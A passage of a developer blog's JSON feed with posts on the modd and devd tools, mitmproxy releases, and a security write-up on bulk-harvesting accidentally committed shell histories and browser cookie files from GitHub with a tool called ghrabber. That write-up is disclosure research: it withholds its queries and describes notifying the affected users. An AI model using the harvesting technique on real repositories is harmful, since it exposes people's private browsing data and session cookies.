rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\">devd<\/a>, a pretty\nstandard Go project. In a future post, I'll show how I've replaced Gulp\nentirely for a Javascript-heavy front-end project.<\/p>\n<p>Please see the <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/modd\">modd documentation<\/a> for a\ncomplete explanation of the syntax and for more examples.<\/p>\n<h2 id=\"test-compile-cycle-for-go\">Test-compile cycle for Go<\/h2>\n<p>On startup, modd looks for a file called <em>modd.conf<\/em> in the current directory.\nThis file has a simple but powerful syntax - one or more blocks of commands,\neach of which can be triggered on changes to files matching a set of file\npatterns. Commands have two flavors: <strong>prep<\/strong> commands that run and terminate\n(e.g. compiling, running test suites or running linters), and <strong>daemon<\/strong>\ncommands that run and keep running (e.g databases or webservers). Daemons are\nrestarted when their block is triggered, after all prep commands have run\nsuccessfully. Commands are embedded shell scripts, so shell features like\nredirection work, and compound, multi-step commands are common.<\/p>\n<p>Here is the simple <strong>modd.conf<\/strong> I use to drive the test cycle for\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\">devd<\/a>:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>**\/*.go {<\/span><\/span>\n<span class=\"giallo-l\"><span>    prep: go test @dirmods<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span>**\/*.go !**\/*_test.go {<\/span><\/span>\n<span class=\"giallo-l\"><span>    prep: go install .\/cmd\/devd<\/span><\/span>\n<span class=\"giallo-l\"><span>    daemon +sigterm: devd -ml .\/tmp<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>After the <em>modd<\/em> command, the commands execute for the first time, and modd is\nthen ready to respond to changes. The initial output looks like this:<\/p>\n<div class=\"media\">\n    <a href=\"modd-devd.png\">\n        <img src=\"modd-devd.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The config file does three things:<\/p>\n<ul>\n<li>When any .go file changes, it runs \"go test\" on the affected module.<\/li>\n<li>When a non-test file changes, it compiles and installs devd.<\/li>\n<li>It keeps a test instance of the devd daemon running, and restarts it with a\nSIGTERM when needed.<\/li>\n<\/ul>\n<p>The one subtlety here is the <strong>@dirmods<\/strong> tag, which is replaced with a\nshell-escaped list of all directories that contain modified files. There's a\nsimilar tag - <strong>@mods<\/strong> - that is replaced with all matching modified files.\nWhen first run, both of these tags are replaced by all possible matches - that\nis, all directories containing matching files, and all matching files\nrespectively. This means that the test suite for all the Go modules in the\nproject is run on startup, and only for modified modules after that.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>In fact, this is <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/modd\/blob\/master\/CHANGELOG.md\">release\nv0.2<\/a>, which slipped\nin before I had time to announce v0.1 on my blog.<\/p>\n<\/div>\n"},{"title":"mitmproxy v0.15","published":"2015-12-04T00:00:00+00:00","updated":"2015-12-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_15\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_15\/","content":"<div class=\"media\">\n    <a href=\"http:&#x2F;&#x2F;mitmproxy.org\">\n        <img src=\"..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>We've just released <a rel=\"external\" href=\"http:\/\/www.mitmproxy.org\">mitmproxy 0.15<\/a>. This is\nprimarily a bugfix release, but with a few really juicy long-demanded features\nthrown in:<\/p>\n<ul>\n<li>Support for loading and converting older dumpfile formats (0.13 and up)<\/li>\n<li>Content views for inline script (@chrisczub)<\/li>\n<li>Better handling of empty header values (Benjamin Lee\/@bltb)<\/li>\n<li>Fix a gnarly memory leak in mitmdump<\/li>\n<li>A number of bugfixes and small improvements<\/li>\n<\/ul>\n<p>Behind the scenes, there has been a bunch of other exciting developments. The\neffort to port mitmproxy and its underlying libraries to Python3 continues\napace. Our automated build and testing infrastructure has improved hugely - we\nnow have <a rel=\"external\" href=\"http:\/\/snapshots.mitmproxy.org\">up-to-date binary snapshots built for each\ncommit<\/a>.<\/p>\n<p>Thanks to all the contributors who helped get this release out the door, and,\nas usual, special thanks to my invaluable co-maintainer\n<a rel=\"external\" href=\"https:\/\/maximilianhils.com\/\">Max<\/a>, who's been steering things while I've been\nkept busy with other things.<\/p>\n"},{"title":"Trawling Github for cookies, bookmarks and browsing history","published":"2015-11-26T00:00:00+00:00","updated":"2015-11-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/hacks\/github-browserstate\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/hacks\/github-browserstate\/","content":"<p>It's a universal rule that search over a sufficiently large body of user data\nposes security challenges. This follows naturally from the fact that humans -\neven smart, informed, careful humans - occasionally slip up. Given enough data,\nand the ability to pick out slip-ups with search, there will always be rich\npickings for a malefactor. I wrote a short series of posts a while ago about\ninteresting things I found on Github - <a href=\"https:\/\/corte.si\/posts\/hacks\/github-shhistory\/\">commands from shell history\nfiles<\/a>, <a href=\"https:\/\/corte.si\/posts\/hacks\/github-pipechains\/\">common pipe\nchains<\/a>, and words from <a href=\"https:\/\/corte.si\/posts\/hacks\/github-spellingdicts\/\">custom\nspell-check dictionaries<\/a>. While\nshell history files could definitely contain very sensitive information, in\npractice there were only a handful of really damaging issues in the dataset.\nTrawling around people's dotfile directories, I found that something much more\ndamaging often made it into repos: browser state. It's easy to see how this\ncould happen - it takes just one injudicious add of a hidden directory to\nexpose cookies, browser history, bookmarks and more. I decided to return to\nthis issue later, and it slipped off my radar until recently.<\/p>\n<p>When I wrote the first series of posts, I also released a <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/ghrabber\">tiny tool called\nghrabber<\/a> (just a hack, really) that lets\nyou grab files from Github en-masse using a Github code search query. The first\nthing I noticed when I picked it up again is that it no longer worked as\nexpected. I used to be able to retrieve all files matching a path, like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">    ghrabber.py<\/span><span style=\"color: #032F62;\"> &quot;path:.bash_history&quot;<\/span><\/span><\/code><\/pre>\n<p>Today, this returns an error - Github now requires you to specify both a search\nterm <strong>and<\/strong> a path<sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup>. There are all sorts of possible explanations for this\nchange, but I like to think that it's meant to prevent (or at least impede)\nexactly the kind of trawling I've been amusing myself with.<\/p>\n<p>Let's say we want to search for Firefox browser profile cookies. These are\nstored in a SQLite file called \"cookie.sql\". Github doesn't index binary files\nfor search, so we can't search for characteristic content in the file. Path\nspecification is broken, so we can't search for the filename. Stumped, right?\nNot so fast - the cookie files live in a directory with a large number of\nassociated non-binary files. If we could come up with a signature for one of\nthese accompanying files, then we could download a path relative to the match\nto retrieve the cookie storage file itself. I quickly <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/ghrabber\/commit\/9b7909ccd594168ab8eb3d44834055b510e90273\">added a flag to do\nexactly this to\nghrabber<\/a>,\nand cooked up appropriate query strings to detect Firefox and Chrome browser\nprofiles. I'll elide those here, for obvious reasons.<\/p>\n<h2 id=\"a-look-at-the-data\">A look at the data<\/h2>\n<p>The result was <strong>708<\/strong> distinct browser profiles that included <strong>33 364<\/strong>\nbookmarks, and <strong>88 013<\/strong> cookies. Many of these profiles are actually\nintentional checkins - testing trusses, blank profiles and so forth. However,\nsome totally unscientific manual sampling indicates that just less than half of\nthese are probably genuine accidental checkins, containing private information.<\/p>\n<p>Let's take a light, high-level look at the data. The figure below shows the\npercentage of profiles with cookies from each TLD:<\/p>\n<figure>\n    <img class=\"img-responsive center-block\" src=\".\/cookies.png\"\/>\n    <figcaption class=\"text-center\">Percentage of profiles with cookies from domain<\/figcaption>\n<\/figure>\n<p>As expected, the stats here are dominated by the mega-trackers that infest\nalmost every site on the internet - a familiar cast of rogues including\nDoubleClick, Scorecard Research, Quantserve and so forth. It's sad to see how\nfew domains here are genuine destinations - apparently the top sites for this\nsample are Google, YouTube, Github (not unexpectedly), and Twitter.<\/p>\n<p>Next up is the percentage of profiles with bookmarks for a given domain:<\/p>\n<figure>\n    <img class=\"img-responsive center-block\" src=\".\/bookmarks.png\"\/>\n    <figcaption class=\"text-center\">Percentage of profiles with bookmarks for domain<\/figcaption>\n<\/figure>\n<p>Here, the top domains are those pre-seeded on install, particularly with\nFirefox. This explains the Mozilla domains as well as ubuntu.com, debian.org\nand launchpad.net. Once we're outside of this list, the \"genuine destinations\"\nmatch the cookie dataset quite well - YouTube, Github, Wikipedia, and so forth.<\/p>\n<h2 id=\"a-difficult-situation\">A difficult situation<\/h2>\n<p>The surprise here is not that people accidentally check sensitive information\ninto git repos. The real surprise is just how much of a pain in the butt it was\nto responsibly address the issue. At the end of this little experiment, I had\nmore than 700 repositories that potentially contained sensitive, accidentally\nexposed user information. It beggars belief, but it's 2015 and the most popular\nrepository hosting service in the world <a rel=\"external\" href=\"https:\/\/github.com\/isaacs\/github\/issues\/37\">has <strong>no way<\/strong> to privately report a\nbug against a repo<\/a>. One could\ncreate a public bug report for each repository in question - but that would be\nlike hanging out a neon sign saying \"privacy issue here\" for others to find,\nparticularly since bug reports are published in a user's activity stream.<\/p>\n<p>In the end, I decided to directly notify as many people as I could by email.\nSo, I wrote a script that checked each affected user's profile for an email\naddress. That left me with 120-odd users with contact details. I manually\nwhittled these down to repositories that were obviously accidental checkins and\nsent them each an email, resulting in a dozen or so responses with variations\non \"oops, thanks for letting me know\".<\/p>\n<h2 id=\"hey-github\">Hey Github!<\/h2>\n<p>I have two recommendations for Github that would make this situation vastly,\nvastly better:<\/p>\n<ul>\n<li>\n<p>Add a mechanism that lets users report private bugs, visible only to the repo\nowners. There's just no excuse for the lack of a feature like this.<\/p>\n<\/li>\n<li>\n<p>Consider restricting search functionality somewhat. One option would be not\nto index dotfiles (.*) by default, and perhaps let users opt in to dotfile\nindexing on a per-repo basis. The vast majority of accidental checkins are\neither within dotfiles (shell history, for example), or within directories\nthat start with leading dots (browser history, ssh config)<\/p>\n<\/li>\n<\/ul>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>In fact, Github search path specifications seem to be broken now in a\nmore general way, but that's beside the point for this post.<\/p>\n<\/div>\n"},{"title":"devd v0.3","published":"2015-11-12T00:00:00+00:00","updated":"2015-11-12T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/devd\/0.3\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/devd\/0.3\/","content":"<div class=\"media\">\n    <a href=\"https:&#x2F;&#x2F;github.com&#x2F;cortesi&#x2F;devd\">\n        <img src=\"..&#x2F;intro&#x2F;devd-terminal.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just released <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\/releases\">devd 0.3<\/a> - a\nmeasured increment, with a modest set of bugfixes and new features. This is\ninline with my <a href=\"https:\/\/corte.si\/posts\/devd\/0.2\/\">broad plan  to keep devd a small, dependable, and focused\ntool.<\/a> Everyone should update.<\/p>\n<ul>\n<li>-s (--tls) Generate a self-signed certificate, and enable TLS. The cert\nbundle is stored in ~\/.devd.cert<\/li>\n<li>Add the X-Forwarded-Host header to reverse proxied traffic.<\/li>\n<li>Disable upstream cert validation for reverse proxied traffic. This makes\nusing self-signed certs for development easy. Devd shoudn't be used in\ncontexts where this might pose a security risk.<\/li>\n<li>Bugfix: make CSS livereload work in Firefox<\/li>\n<li>Bugfix: make sure the Host header and SNI host matches for reverse proxied\ntraffic.<\/li>\n<\/ul>\n"},{"title":"mitmproxy: release v0.14","published":"2015-11-07T00:00:00+00:00","updated":"2015-11-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_14\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_14\/","content":"<div class=\"media\">\n    <a href=\"https:&#x2F;&#x2F;mitmproxy.org\">\n        <img src=\"..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>We've just released <a rel=\"external\" href=\"http:\/\/www.mitmproxy.org\">mitmproxy 0.14<\/a>! Since the last\nrelease, the project has had 399 commits by 13 contributors, resulting in 79\nclosed issues and 37 closed PRs, all of this in just over 100 days.<\/p>\n<ul>\n<li>Docs: Greatly updated docs <a rel=\"external\" href=\"http:\/\/docs.mitmproxy.org\">now hosted on ReadTheDocs<\/a><\/li>\n<li>Docs: Fixed Typos, updated URLs etc. (Nick Badger, Ben Lerner, Choongwoo Han,\nonlywade, Jurriaan Bremer)<\/li>\n<li>mitmdump: Colorized TTY output<\/li>\n<li>mitmdump: Use mitmproxy's content views for human-readable output (Chris Czub)<\/li>\n<li>mitmproxy and mitmdump: Support for displaying UTF8 contents<\/li>\n<li>mitmproxy: add command line switch to disable mouse interaction (Timothy Elliott)<\/li>\n<li>mitmproxy: bug fixes (Choongwoo Han, sethp-jive, FreeArtMan)<\/li>\n<li>mitmweb: bug fixes (Colin Bendell)<\/li>\n<li>libmproxy: Add ability to fall back to TCP passthrough for non-HTTP connections.<\/li>\n<li>libmproxy: Avoid double-connect in case of TLS Server Name Indication. This\nyields a massive speedup for TLS handshakes.<\/li>\n<li>libmproxy: Prevent unneccessary upstream connections (macmantrl)<\/li>\n<li>Inline Scripts: New <a rel=\"external\" href=\"http:\/\/docs.mitmproxy.org\/en\/latest\/dev\/models.html#netlib.http.Headers\">API for HTTP\nHeaders<\/a><\/li>\n<li>Inline Scripts: Properly handle exceptions in <code>done<\/code> hook<\/li>\n<li>Inline Scripts: Allow relative imports, provide <code>__file__<\/code><\/li>\n<li>Examples: Add probabilistic TLS passthrough as an inline script<\/li>\n<li>netlib: Refactored HTTP protocol handling code<\/li>\n<li>netlib: ALPN support<\/li>\n<li>netlib: fixed a bug in the optional certificate verification.<\/li>\n<li>netlib: Initial Python 3.5 support (this is the first prerequisite for 3.x support in mitmproxy)<\/li>\n<\/ul>\n<p>I had very little time to spend on mitmproxy this cycle due to an\nextraordinarily busy patch at work - so, all of the above was shepherded into\nbeing by my hyper-efficient co-maintainer, <a rel=\"external\" href=\"https:\/\/maximilianhils.com\/\">Maximilian\nHils<\/a>. Having a steady pair of hands to keep\nthings on track while I've been \"absent\" has been great. As a project, we'd\nalso like to thank Google, who sponsored the work of <a rel=\"external\" href=\"https:\/\/github.com\/Kriechi\">Thomas\nKriechbaumer<\/a> under the <a rel=\"external\" href=\"https:\/\/developers.google.com\/open-source\/soc\/\">Google Summer of\nCode<\/a> program, and the\n<a rel=\"external\" href=\"https:\/\/www.honeynet.org\/\">Honeynet Project<\/a> under whose aegis the GSoC work\nwas done. The excellent work Thomas has done on HTTP2 support and many, many\nother aspects of mitmproxy has been invaluable. Look for new releases building\non this soon.<\/p>\n"},{"title":"devd v0.2 (and some thoughts on small tools)","published":"2015-11-05T00:00:00+00:00","updated":"2015-11-05T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/devd\/0.2\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/devd\/0.2\/","content":"<p>I've just released <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\/releases\">version 0.2 of\ndevd<\/a>, a local webserver for\ndevelopers. This release contains a number of small improvement, and a few new\nfeatures.<\/p>\n<ul>\n<li>-x (--exclude) flag to exclude files from livereload.<\/li>\n<li>-P (--password) flag for quick HTTP Basic password protection.<\/li>\n<li>-q (--quiet) flag to suppress all output from devd.<\/li>\n<li>Humanize file sizes in console logs.<\/li>\n<li>Improve directory indexes - better formatting, they now also livereload.<\/li>\n<li>Devd's built-in livereload URLs are now less likely to clash with user URLs.<\/li>\n<li>Internal 404 pages are now included in logs, timing measurement, and\nfiltering.<\/li>\n<li>Improved heuristics for livereload file change detection. We now handle\nthings like transient files created by editors better.<\/li>\n<li>A Linux ARM build will now be distributed with each release.<\/li>\n<\/ul>\n<p>Thanks to <a rel=\"external\" href=\"http:\/\/brennie.ca\">Barret Rennie<\/a>, <a rel=\"external\" href=\"http:\/\/billmill.org\">Bill Mill<\/a>\nand Judson Mitchell (<a href=\"mailto:judsonmitchell@gmail.com\">judsonmitchell@gmail.com<\/a>) for contributing to this\nrelease.<\/p>\n<h1 id=\"some-thoughts-on-small-tools\">Some thoughts on small tools<\/h1>\n<p>I love small, modest tools that do one thing well. I wrote devd partly out of\nnostalgia for <a rel=\"external\" href=\"http:\/\/acme.com\/software\/thttpd\/\">thttpd<\/a>, a tiny web daemon that\nused to be my rough-and-ready, just-serve-files-now webserver for many years. It\nwas a single, small binary that I could cross-compile for all the platforms I\nused, and it did its humble job well. Back in the day, it was one of the first\nthings I put on every new box, along with my shell configuration and ssh keys.\nWhen it started showing its age, I moved on to the usual combination of built-in\ninterpreter daemons (e.g. \"python -m SimpleHTTPServer\") and more heavy-handed\ntools, but not without a touch of sadness. Looking back on it now, it's clear\nthat the thttpd I remember is a somewhat rose-tinted version of the real thing:\nthttpd actually did both more and less than I really needed. Devd strives to be\na tool in the same sprit, that matches more closely what I want in my\n<a rel=\"external\" href=\"https:\/\/en.wikipedia.org\/wiki\/Everyday_carry\">EDC<\/a> http daemon. If people think\nof it as a small, dependable and unobtrusive part of their daily toolset, I'll\nhave done <em>my<\/em> job well.<\/p>\n<p>This release includes a few new features for devd, and the next release will add\na few more. Not long after that, I expect it to be more or less feature\ncomplete. It will continue to improve internally, and bugs will always be fixed,\nbut it will never sprout the ability to run PHP or render less on the fly (both\nfeature requests I've had since the first release). Instead, it will focus on\ndoing the few things it does as well as it can: serve files, act as a reverse\nproxy tying development servers together, and live reload when files change.<\/p>\n"},{"title":"devd: a web daemon for developers","published":"2015-10-23T00:00:00+00:00","updated":"2015-10-23T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/devd\/intro\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/devd\/intro\/","content":"<p>I've just released <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\">devd<\/a>, a small,\nself-contained, command-line-only HTTP server for developers. It started as a\nweekend stress-relief hack (that's a thing where I'm from), but has now become\nmy preferred \"daily driver\" for most web-ish things. It's simple, direct and\ndoes more or less exactly what I need. This isn't terribly surprising, since I\nwrote it to scratch my own idiosyncratic itch - hopefully other, similarly itchy\nhackers will find it useful too.<\/p>\n<h2 id=\"quick-start\">Quick start<\/h2>\n<p>Serve the current directory, open it in the browser (<strong>-o<\/strong>), and livereload\nwhen files change (<strong>-l<\/strong>):<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -ol<\/span><span style=\"color: #032F62;\"> .<\/span><\/span><\/code><\/pre>\n<p>Reverse proxy to http:\/\/localhost:8080, and livereload when any file in the\n<strong>src<\/strong> directory changes:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -w<\/span><span style=\"color: #032F62;\"> .\/src http:\/\/localhost:8080<\/span><\/span><\/code><\/pre><h2 id=\"features\">Features<\/h2>\n<h3 id=\"cross-platform-and-self-contained\">Cross-platform and self-contained<\/h3>\n<p>Devd is a single statically compiled binary with no external dependencies, and\nis released for OSX, Linux and Windows. Don't want to install Node or Python in\nthat light-weight Docker instance you're hacking in? Just copy over the devd\nbinary and be done with it.<\/p>\n<h3 id=\"designed-for-the-terminal\">Designed for the terminal<\/h3>\n<p>This means no config file, no daemonization, and logs that are designed to be\nread in the terminal by a developer. Logs are colorized and log entries span\nmultiple lines. Devd's logs are detailed, warn about corner cases that other\ndaemons ignore, and can optionally include things like detailed timing\ninformation and full headers.<\/p>\n<div class=\"media\">\n    <a href=\"https:&#x2F;&#x2F;github.com&#x2F;cortesi&#x2F;devd\">\n        <img src=\".&#x2F;devd-terminal.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>To make quickly firing up an instance as simple as possible, devd automatically\nchooses an open port to run on (unless it's specified), and can open a browser\nwindow pointing to the daemon root for you (the <strong>-o<\/strong> flag in the example\nabove).<\/p>\n<h3 id=\"livereload\">Livereload<\/h3>\n<p>When livereload is enabled, devd injects a small script into HTML pages, just\nbefore the closing <em>head<\/em> tag. The script listens for change notifications over\na websocket connection, and reloads resources as needed. No browser addon is\nrequired, and livereload works even for reverse proxied apps. If only changes\nto CSS files are seen, devd will only reload external CSS resources, otherwise\na full page reload is done. This serves the current directory with livereload\nenabled:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -l<\/span><span style=\"color: #032F62;\"> .<\/span><\/span><\/code><\/pre>\n<p>You can also trigger livereload for files that are not being served, letting\nyou reload reverse proxied applications when source files change. So, this\ncommand watches the <em>src<\/em> directory tree, and reverse proxies to a locally\nrunning application:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -w<\/span><span style=\"color: #032F62;\"> .\/src http:\/\/localhost:8888<\/span><\/span><\/code><\/pre><h3 id=\"reverse-proxy-static-file-server-flexible-routing\">Reverse proxy + static file server + flexible routing<\/h3>\n<p>Modern apps tend to be collections of web servers, and devd caters for this\nwith flexible reverse proxying. You can use devd to overlay a set of services\non a single domain, add livereload to services that don't natively support it,\nadd throttling and latency simulation to existing services, and so forth.<\/p>\n<p>Here's a more complicated example showing how all this ties together - it\noverlays two applications and a tree of static files. Livereload is enabled for\nthe static files (<strong>-l<\/strong>) and also triggered whenever source files for reverse\nproxied apps change:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -l \\<\/span><\/span>\n<span class=\"giallo-l\"><span>-w<\/span><span style=\"color: #032F62;\"> .\/src\/<\/span><span style=\"color: #005CC5;\"> \\<\/span><\/span>\n<span class=\"giallo-l\"><span>\/=http:\/\/localhost:8888<\/span><span style=\"color: #005CC5;\"> \\<\/span><\/span>\n<span class=\"giallo-l\"><span>\/api\/=http:\/\/localhost:8889<\/span><span style=\"color: #005CC5;\"> \\<\/span><\/span>\n<span class=\"giallo-l\"><span>\/static\/=.\/assets<\/span><\/span><\/code><\/pre><h3 id=\"light-weight-virtual-hosting\">Light-weight virtual hosting<\/h3>\n<p>Devd uses a dedicated domain - <strong>devd.io<\/strong> - to do simple virtual hosting. This\ndomain and all its subdomains resolves to 127.0.0.1, which we use to set up\nvirtual hosting without any changes to <em>\/etc\/hosts<\/em> or other local\nconfiguration. Route specifications that don't start with a leading <strong>\/<\/strong> are\ntaken to be subdomains of <strong>devd.io<\/strong>. So, the following command serves a\nstatic site from devd.io, and reverse proxies a locally\nrunning app on api.devd.io:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #032F62;\"> .\/static api=http:\/\/localhost:8888<\/span><\/span><\/code><\/pre>\n<p>Check out the docs at <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/devd\">the Github repo<\/a> for\nthe full route specification syntax.<\/p>\n<h3 id=\"latency-and-bandwidth-simulation\">Latency and bandwidth simulation<\/h3>\n<p>Want to know what it's like to use your fancy 5mb HTML5 app from a mobile phone\nin Botswana? Look up the bandwidth and latency\n<a rel=\"external\" href=\"http:\/\/www.cisco.com\/c\/en\/us\/solutions\/collateral\/service-provider\/global-cloud-index-gci\/CloudIndex_Supplement.html\">here<\/a>,\nand invoke devd like so (making sure to convert from kilobits per second to\nkilobytes per second):<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">devd<\/span><span style=\"color: #005CC5;\"> -d 114 -u 51 -l 75<\/span><span style=\"color: #032F62;\"> .<\/span><\/span><\/code><\/pre>\n<p>Devd tries to be reasonably accurate in simulating bandwidth and latency - it\nuses a token bucket implementation for throttling, properly handles concurrent\nrequests, and chunks traffic up so data flow is smooth.<\/p>\n"},{"title":"mitmproxy: release v0.13","published":"2015-07-26T00:00:00+00:00","updated":"2015-07-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_13\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_13\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif\">\n        <img src=\"..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This is a slightly late announcement of the release of <a rel=\"external\" href=\"https:\/\/mitmproxy.org\">mitmproxy\nv0.13<\/a>, which was pushed out the door earlier this week\nby my esteemed compatriots while I was tied up with other things. We have a\nnumber of big new features this time round. First, mitmproxy now has upstream\ncertificate validation, thanks to the hard work of <a rel=\"external\" href=\"https:\/\/github.com\/kyle-m\">Kyle\nMorton<\/a>. Mitmproxy is increasingly being used in\nuser-oriented roles where upstream cert validation is crucial, so this is a\nwelcome improvement. We also have a new transparent proxy mode, which uses the\nHTTP Host headers to detect the upstream server to connect to, rather than the\nOS NAT tables. This isn't accurate 100% of the time, but it's so convenient\nthat having it in the base makes sense. Thanks to\n<a rel=\"external\" href=\"https:\/\/github.com\/ijiro123\">Ijiro123<\/a>. Other improvements include include\nmarking of flows in mitmproxy console (thanks to <a rel=\"external\" href=\"https:\/\/github.com\/drahosj\">Jake\nDrahos<\/a>) and and an addition to the filter language\nallowing better matching of source and destination addresses (thanks to <a rel=\"external\" href=\"https:\/\/github.com\/isra17\">Israel\nHalle<\/a>)<\/p>\n<p>This release also features something a bit more unusual: a removed feature. We\nadded the ability to forward server certificates through to the client verbatim\nto allow mitmproxy to exploit the infamous\n<a rel=\"external\" href=\"https:\/\/www.imperialviolet.org\/2014\/02\/22\/applebug.html\">#gotofail<\/a> bug on IOS\nand OSX. We were one of the first (and perhaps THE first) publicly available\nmechanisms to exploit this issue, and pen testers, app reversers and curious\nfolks everywhere rejoiced. Unfortunately, cert forwarding has become a support\nburden - for fiddly technical reasons, it adds a lot of complication to the way\nmitmproxy is distributed and installed. Since #gotofail is no longer so\ncurrent, we've decided to remove support from mitmproxy. If you still have some\nvulnerable devices out there you need to muck with, the official answer at the\nmoment is to install v0.12.<\/p>\n"},{"title":"mitmproxy v0.12.1","published":"2015-06-04T00:00:00+00:00","updated":"2015-06-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_12_1\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_12_1\/","content":"<div class=\"media\">\n    <a href=\"mitmproxy_0_12_1.gif\">\n        <img src=\"mitmproxy_0_12_1.gif\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just released <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy v0.12.1<\/a>. This release\nfixes a few crashing bugs that slipped through in the previous iteration, so\neveryone should upgrade.<\/p>\n<p>Also included are a number of small improvements. The most noticeable of these\nis mouse interaction for mitmproxy console - the screen capture above shows me\nscrolling with my mouse, clicking to view a flow and switch tabs. We pay a\nsmall price for this - users now have to hold down a modifier key (shift on\nsome systems, alt on others) to select text in the terminal for copying and\npasting. To ease users into this, we've added a warning if we detect an attempt\nto select text without the right modifier key.<\/p>\n"},{"title":"mitmproxy: release v0.12 and some project news","published":"2015-05-26T00:00:00+00:00","updated":"2015-05-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_12\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_12\/","content":"<h2 id=\"project-news\">Project News<\/h2>\n<p>Before we get to the new release, I'd like to give a quick update on some\ninternal project developments.<\/p>\n<p>First up, after a somewhat involved process that included a couple of rounds of\ncommunity voting and much discussion, we have a new logo:<\/p>\n<div class=\"media\">\n    <a href=\"mitmproxy-long.png\">\n        <img src=\"mitmproxy-long.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This will be rolled out in all the places where it makes sense along with the\n0.12 release.<\/p>\n<p>Second, the long-dormant <a rel=\"external\" href=\"http:\/\/twitter.com\/mitmproxy\">@mitmproxy<\/a> Twitter\naccount is finally waking up. Please follow us there for mitmproxy project\nupdates and related news.<\/p>\n<p>Third, we'd like to welcome <a rel=\"external\" href=\"https:\/\/github.com\/Kriechi\">Thomas Kriechbaumer<\/a>\nto the project. Thomas is being sponsored to work on mitmproxy under the\n<a rel=\"external\" href=\"https:\/\/developers.google.com\/open-source\/soc\/\">Google Summer of 